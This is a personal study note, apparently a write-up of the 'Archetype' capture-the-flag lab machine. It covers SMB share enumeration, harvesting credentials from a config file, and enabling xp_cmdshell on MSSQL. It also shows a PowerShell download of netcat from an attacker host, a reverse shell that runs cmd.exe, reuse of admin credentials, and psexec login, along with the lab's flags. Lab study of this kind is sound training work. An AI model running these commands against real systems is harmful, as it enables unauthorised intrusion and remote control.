Monty's Learning Notes | Obsidian

    Archetype

    Keywords: #SMB, #mssql, #reverse_shell, #windows, #powershell
    ** Date pwned: ** 2024-10-24

    Nmap scan report for 10.129.179.223
Host is up (0.026s latency).                                                 
Not shown: 65420 closed tcp ports (reset), 103 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

    A share in SMB (Server Message Block) refers to a folder or resource on a network that is made accessible to other computers.
    Allows users on different systems to access files or printers across the network.
    Administrative-shares end in $

    smbclient -N -L 10.129.179.223

    Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

    smbclient //10.129.179.223/backups -U anonymous

    Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020
5056511 blocks of size 4096. 2617883 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (8.0 KiloBytes/sec) (average 8.0 KiloBytes/sec)

    Credentials of prodConfig: Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc

    user.txt in sql_svc: 3e7b102e78218e935bf3f4951fec21a3

    Connect to Microsoft SQL using the credentials in prodConfig

    spawn Windows command shell through extended stored procedure of Microsoft SQL Server -> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'dir C:\';

    Download Powershell reverseshell using windows command shell -> powershell -c cd C:\Users\sql_svc\Downloads; wget http://hostIP/nc64.exe -outfile nc64.exe

    Powershell revseseshell execute -> powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe targetIP 443

    Get powershell history
    cd AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\
    admin username: administrator
    admin password: MEGACORP_4dm1n!!

    Powershell history contained admin credentials

    Login into root
    sudo python3 psexec.py administrator@<target-ip>
    root.txt: b91ccec3305e98240082d4474b848528